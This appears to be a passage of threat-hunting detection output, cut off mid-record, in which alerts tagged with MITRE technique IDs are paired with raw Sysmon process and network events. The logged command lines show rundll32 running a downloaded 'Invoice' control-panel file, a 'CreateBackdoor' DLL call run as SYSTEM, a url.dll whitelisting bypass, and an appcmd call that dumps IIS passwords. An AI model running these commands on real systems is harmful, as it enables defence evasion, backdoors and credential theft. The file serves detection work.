+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;, )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:11:17.621241Z"">
+    </TimeCreated>
+    <EventRecordID>4864</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:11:17.503</Data>
+    <Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010A8D75500</Data>
+    <Data Name=""ProcessId"">4884</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
+    <Data Name=""LogonId"">0x4131b5</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
+    <Data Name=""ParentProcessId"">4356</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;, )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:11:17.621241Z"">
+    </TimeCreated>
+    <EventRecordID>4864</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:11:17.503</Data>
+    <Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010A8D75500</Data>
+    <Data Name=""ProcessId"">4884</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
+    <Data Name=""LogonId"">0x4131b5</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
+    <Data Name=""ParentProcessId"">4356</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1558452781.141798,2019-05-21T19:33:01.141798+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( aka112.inwitelecom.net ) , IP ( 105.73.6.112 ) and port ( 80 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-21T15:33:00.140358Z"">
+    </TimeCreated>
+    <EventRecordID>4131</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3416"" ThreadID=""3628"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-21 06:58:40.518</Data>
+    <Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
+    <Data Name=""ProcessId"">2432</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">IEWIN7..home</Data>
+    <Data Name=""SourcePort"">49704</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">105.73.6.112</Data>
+    <Data Name=""DestinationHostname"">aka112.inwitelecom.net</Data>
+    <Data Name=""DestinationPort"">80</Data>
+    <Data Name=""DestinationPortName"">http</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.189133Z"">
+    </TimeCreated>
+    <EventRecordID>243532</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:24.985</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-001079652000</Data>
+    <Data Name=""ProcessId"">3300</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.189133Z"">
+    </TimeCreated>
+    <EventRecordID>243532</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:24.985</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-001079652000</Data>
+    <Data Name=""ProcessId"">3300</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.189133Z"">
+    </TimeCreated>
+    <EventRecordID>243532</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:24.985</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-001079652000</Data>
+    <Data Name=""ProcessId"">3300</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe  url.dll,FileProtocolHandler calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:33:37.078801Z"">
+    </TimeCreated>
+    <EventRecordID>16391</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:33:37.063</Data>
+    <Data Name=""ProcessGuid"">365ABB72-20B1-5CD8-0000-001064D62400</Data>
+    <Data Name=""ProcessId"">1844</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  url.dll,FileProtocolHandler calc.exe</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
+    <Data Name=""ParentProcessId"">2936</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe  url.dll,FileProtocolHandler calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:33:37.078801Z"">
+    </TimeCreated>
+    <EventRecordID>16391</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:33:37.063</Data>
+    <Data Name=""ProcessGuid"">365ABB72-20B1-5CD8-0000-001064D62400</Data>
+    <Data Name=""ProcessId"">1844</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  url.dll,FileProtocolHandler calc.exe</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
+    <Data Name=""ParentProcessId"">2936</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe  url.dll,FileProtocolHandler calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:33:37.078801Z"">
+    </TimeCreated>
+    <EventRecordID>16391</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:33:37.063</Data>
+    <Data Name=""ProcessGuid"">365ABB72-20B1-5CD8-0000-001064D62400</Data>
+    <Data Name=""ProcessId"">1844</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  url.dll,FileProtocolHandler calc.exe</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
+    <Data Name=""ParentProcessId"">2936</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.973148,2019-05-27T05:29:18.973148+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;ERROR ( message:Configuration error &quot; /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:18.973148Z"">
+    </TimeCreated>
+    <EventRecordID>5943</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:18.933</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-0010EFADFF00</Data>
+    <Data Name=""ProcessId"">2276</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;ERROR ( message:Configuration error &quot; /text:password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
